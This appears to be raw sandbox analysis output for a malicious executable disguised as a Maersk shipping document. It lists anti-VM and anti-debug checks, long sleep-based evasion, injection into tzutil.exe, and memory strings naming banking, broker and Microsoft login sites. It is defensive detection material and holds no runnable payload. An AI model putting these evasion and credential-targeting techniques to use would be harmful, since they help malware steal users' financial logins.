                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: MAERSK LINE SHIPPING DOC_4253.exe PID: 7564, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 33F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: 9B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: AB00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: AD20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: BD20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E rdtsc 3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239757Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239641Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239531Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239416Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239298Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239163Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239042Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238906Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238656Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238525Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238398Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238287Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238047Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237938Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237813Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237688Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237563Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237438Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237328Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237219Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237094Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236984Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236875Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236765Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236656Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236547Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236438Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236313Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeWindow / User API: threadDelayed 1650Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeWindow / User API: threadDelayed 3663Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 3.0 %
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239757s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239416s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239298s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239163s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -239042s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238525s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238398s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238287s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -238047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -237094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7640Thread sleep time: -236313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe TID: 7592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 5428Thread sleep count: 60 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 5428Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0097C9D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0097C9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239757Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239641Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239531Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239416Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239298Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239163Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 239042Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238906Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238656Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238525Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238398Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238287Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 238047Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237938Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237813Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237688Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237563Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237438Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237328Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237219Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 237094Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236984Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236875Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236765Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236656Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236547Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236438Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 236313Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: UQ63g7r-.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: UQ63g7r-.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: UQ63g7r-.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: UQ63g7r-.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: UQ63g7r-.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: UQ63g7r-.6.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: UQ63g7r-.6.drBinary or memory string: global block list test formVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: UQ63g7r-.6.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: UQ63g7r-.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: tzutil.exe, 00000006.00000002.2537188170.000000000315F000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2537552083.00000000014DF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2194230848.0000019C18C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: UQ63g7r-.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: UQ63g7r-.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: UQ63g7r-.6.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: UQ63g7r-.6.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: UQ63g7r-.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: UQ63g7r-.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: UQ63g7r-.6.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: UQ63g7r-.6.drBinary or memory string: discord.comVMware20,11696503903f
                Source: UQ63g7r-.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E rdtsc 3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00417B63 LdrLoadDll,3_2_00417B63
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01844180 mov eax, dword ptr fs:[00000030h]3_2_01844180
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01844180 mov eax, dword ptr fs:[00000030h]3_2_01844180
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185C188 mov eax, dword ptr fs:[00000030h]3_2_0185C188
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185C188 mov eax, dword ptr fs:[00000030h]3_2_0185C188
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182019F mov eax, dword ptr fs:[00000030h]3_2_0182019F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182019F mov eax, dword ptr fs:[00000030h]3_2_0182019F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182019F mov eax, dword ptr fs:[00000030h]3_2_0182019F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182019F mov eax, dword ptr fs:[00000030h]3_2_0182019F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6154 mov eax, dword ptr fs:[00000030h]3_2_017A6154
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6154 mov eax, dword ptr fs:[00000030h]3_2_017A6154
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179C156 mov eax, dword ptr fs:[00000030h]3_2_0179C156
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018661C3 mov eax, dword ptr fs:[00000030h]3_2_018661C3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018661C3 mov eax, dword ptr fs:[00000030h]3_2_018661C3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E1D0 mov eax, dword ptr fs:[00000030h]3_2_0181E1D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E1D0 mov eax, dword ptr fs:[00000030h]3_2_0181E1D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0181E1D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E1D0 mov eax, dword ptr fs:[00000030h]3_2_0181E1D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E1D0 mov eax, dword ptr fs:[00000030h]3_2_0181E1D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D0124 mov eax, dword ptr fs:[00000030h]3_2_017D0124
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018761E5 mov eax, dword ptr fs:[00000030h]3_2_018761E5
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D01F8 mov eax, dword ptr fs:[00000030h]3_2_017D01F8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov eax, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov ecx, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov eax, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov eax, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov ecx, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov eax, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov eax, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov ecx, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov eax, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184E10E mov ecx, dword ptr fs:[00000030h]3_2_0184E10E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01860115 mov eax, dword ptr fs:[00000030h]3_2_01860115
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184A118 mov ecx, dword ptr fs:[00000030h]3_2_0184A118
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184A118 mov eax, dword ptr fs:[00000030h]3_2_0184A118
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184A118 mov eax, dword ptr fs:[00000030h]3_2_0184A118
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184A118 mov eax, dword ptr fs:[00000030h]3_2_0184A118
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01834144 mov eax, dword ptr fs:[00000030h]3_2_01834144
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01834144 mov eax, dword ptr fs:[00000030h]3_2_01834144
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01834144 mov ecx, dword ptr fs:[00000030h]3_2_01834144
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01834144 mov eax, dword ptr fs:[00000030h]3_2_01834144
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01834144 mov eax, dword ptr fs:[00000030h]3_2_01834144
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01838158 mov eax, dword ptr fs:[00000030h]3_2_01838158
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874164 mov eax, dword ptr fs:[00000030h]3_2_01874164
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874164 mov eax, dword ptr fs:[00000030h]3_2_01874164
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179A197 mov eax, dword ptr fs:[00000030h]3_2_0179A197
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179A197 mov eax, dword ptr fs:[00000030h]3_2_0179A197
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179A197 mov eax, dword ptr fs:[00000030h]3_2_0179A197
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E0185 mov eax, dword ptr fs:[00000030h]3_2_017E0185
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CC073 mov eax, dword ptr fs:[00000030h]3_2_017CC073
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A2050 mov eax, dword ptr fs:[00000030h]3_2_017A2050
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018380A8 mov eax, dword ptr fs:[00000030h]3_2_018380A8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018660B8 mov eax, dword ptr fs:[00000030h]3_2_018660B8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018660B8 mov ecx, dword ptr fs:[00000030h]3_2_018660B8
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179A020 mov eax, dword ptr fs:[00000030h]3_2_0179A020
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179C020 mov eax, dword ptr fs:[00000030h]3_2_0179C020
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018220DE mov eax, dword ptr fs:[00000030h]3_2_018220DE
